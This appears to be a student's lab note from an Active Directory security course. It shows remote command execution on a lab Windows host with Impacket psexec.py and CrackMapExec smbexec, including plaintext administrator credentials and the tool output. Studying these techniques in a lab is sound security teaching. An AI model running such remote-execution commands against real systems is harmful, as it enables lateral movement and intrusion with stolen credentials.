# NTUSTISC - AD Note - Lab(遠端執行(RDP)2)
[TOC]
Lecture Video: [ 2022/05/11 AD 安全 2 ](https://youtu.be/ubNMQ7_dcm0?si=26g2Lz2CB-O-7S5d)
## Background
[NTUSTISC - AD Note - Lab(Password Spraying)](https://hackmd.io/@SBK6401/Byk16MV0n)
[滲透測試的利器 - Impacket](https://sectools.tw/impacket/):
> python撰寫的內網滲透工具
## Lab
### ==遠端執行(RDP)2==
* Kali-Linux Tools
* Impacket(Kali-Linux愛好者可使用的PsExec)
```bash
# Set up & Install
$ git clone https://github.com/fortra/impacket.git
$ cd impacket
$ conda activate py3.7 # Recommended to install it in conda
$ pip3 install -r requirements.txt
$ python3 setup.py install
# Cheat-Sheet
$ conda activate py3.7
$ proxychains psexec.py <username>:<password>@<ip> whoami
```
* CrackMapExec
```bash
$ crackmapexec smb [IP] -u <username> -p <password --exec-method smbexec -x '<command>'
```
exec-method支援以下方法:
* mmcexec
* smbexec
* wmiexec
* atexec
#### ==How to use Impacket==
感覺應該是proxychains壞掉了,或是有一些其他問題,導致Connection Refused,總而言之,這套工具就是讓kali-linux也可以使用psexec這個工具
```bash
$ proxychains psexec.py kuma\administrators:1qaz@WSX3edc@192.168.222.129 dir
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.12.0.dev1+20230928.173259.06217f05 - Copyright 2023 Fortra
[proxychains] Strict chain ... 127.0.0.1:9050 ... timeout
[-] [Errno Connection error (192.168.222.129:445)] [Errno 111] Connection refused
```
#### ==How to use CrackMapExec==
還記的之前的Lab([NTUSTISC - AD Note - Lab(Password Spraying)](https://hackmd.io/@SBK6401/Byk16MV0n)),有使用過這套工具,當時是為了做密碼揮灑的目的,不過考慮到psexec這個工具本質上就是爬到遠端的主機,然後開execve的process,並且跟他溝通,所以在這樣的前提下,就可以直接用CrackMapExec達到和psexec一樣的效果,畢竟兩者本質是做的事情差不多
:::spoiler Execution Result
```bash
$ crackmapexec smb 192.168.222.129 -u administrator -p 1qaz@WSX3edc --exec-method smbexec -x 'dir C:\tools'
SMB 192.168.222.129 445 DESKTOP-G95U93T [*] Windows 10.0 Build 18362 x64 (name:DESKTOP-G95U93T) (domain:kuma.org) (signing:False) (SMBv1:False)
SMB 192.168.222.129 445 DESKTOP-G95U93T [+] kuma.org\administrator:1qaz@WSX3edc (Pwn3d!)
SMB 192.168.222.129 445 DESKTOP-G95U93T [+] Executed command via smbexec
SMB 192.168.222.129 445 DESKTOP-G95U93T ║╧║╨░╧ C ññ¬║║╧║╨¿Sª│╝╨┼╥íC
SMB 192.168.222.129 445 DESKTOP-G95U93T ║╧║╨░╧º╟╕╣: C230-62CE
SMB 192.168.222.129 445 DESKTOP-G95U93T
SMB 192.168.222.129 445 DESKTOP-G95U93T C:\tools ¬║Ñ╪┐²
SMB 192.168.222.129 445 DESKTOP-G95U93T
SMB 192.168.222.129 445 DESKTOP-G95U93T 2023/09/17 ñUñ╚ 03:15 <DIR> .
SMB 192.168.222.129 445 DESKTOP-G95U93T 2023/09/17 ñUñ╚ 03:15 <DIR> ..
SMB 192.168.222.129 445 DESKTOP-G95U93T 2023/09/04 ñWñ╚ 12:57 <DIR> AccessChk
SMB 192.168.222.129 445 DESKTOP-G95U93T 2021/06/22 ñUñ╚ 02:58 1,379,216 accesschk.exe
SMB 192.168.222.129 445 DESKTOP-G95U93T 2023/08/28 ñUñ╚ 11:41 <DIR> BloodHound-master
SMB 192.168.222.129 445 DESKTOP-G95U93T 2023/08/27 ñWñ╚ 11:32 <DIR> BloodHound-win32-x64
SMB 192.168.222.129 445 DESKTOP-G95U93T 2023/08/29 ñWñ╚ 01:24 <DIR> BloodHound-win32-x64-4.1.0
SMB 192.168.222.129 445 DESKTOP-G95U93T 2021/09/29 ñWñ╚ 01:19 373,760 Certify.exe
SMB 192.168.222.129 445 DESKTOP-G95U93T 2021/09/29 ñUñ╚ 02:39 1,137,664 DNSAdmin-DLL.dll
SMB 192.168.222.129 445 DESKTOP-G95U93T 2023/09/04 ñWñ╚ 10:02 443,650 Invoke-NinjaCopy.ps1
SMB 192.168.222.129 445 DESKTOP-G95U93T 2021/09/29 ñUñ╚ 04:50 <DIR> KDU-1.1.0
SMB 192.168.222.129 445 DESKTOP-G95U93T 2023/09/17 ñUñ╚ 12:08 1,590 Kerberos-AS-REP.txt
SMB 192.168.222.129 445 DESKTOP-G95U93T 2005/01/17 ñUñ╚ 05:23 22,528 KmdManager.exe
SMB 192.168.222.129 445 DESKTOP-G95U93T 2021/09/29 ñUñ╚ 04:50 <DIR> mimikatz_trunk
SMB 192.168.222.129 445 DESKTOP-G95U93T 2023/08/27 ñWñ╚ 11:31 <DIR> neo4j-community-4.3.4
SMB 192.168.222.129 445 DESKTOP-G95U93T 2021/09/29 ñUñ╚ 04:51 <DIR> nopad
SMB 192.168.222.129 445 DESKTOP-G95U93T 2021/09/28 ñUñ╚ 11:09 27,136 PrintSpoofer64.exe
SMB 192.168.222.129 445 DESKTOP-G95U93T 2023/09/05 ñWñ╚ 11:51 <DIR> Procdump
SMB 192.168.222.129 445 DESKTOP-G95U93T 2021/09/29 ñUñ╚ 05:08 <DIR> ProcessExplorer
SMB 192.168.222.129 445 DESKTOP-G95U93T 2021/09/29 ñUñ╚ 05:08 <DIR> PSTools
SMB 192.168.222.129 445 DESKTOP-G95U93T 2021/09/29 ñWñ╚ 12:27 301,056 Rubeus.exe
SMB 192.168.222.129 445 DESKTOP-G95U93T 2023/09/04 ñUñ╚ 11:33 <DIR> Sysmon
SMB 192.168.222.129 445 DESKTOP-G95U93T 2021/09/29 ñUñ╚ 04:50 <DIR> Windows-Kernel-Explorer-master
SMB 192.168.222.129 445 DESKTOP-G95U93T 2023/09/06 ñWñ╚ 11:12 <DIR> Zip Folders
SMB 192.168.222.129 445 DESKTOP-G95U93T 8 ¡╙└╔«╫ 3,686,600 ª∞ñ╕▓╒
SMB 192.168.222.129 445 DESKTOP-G95U93T 16 ¡╙Ñ╪┐² 16,192,659,456 ª∞ñ╕▓╒ÑiÑ╬
```
:::
## Reference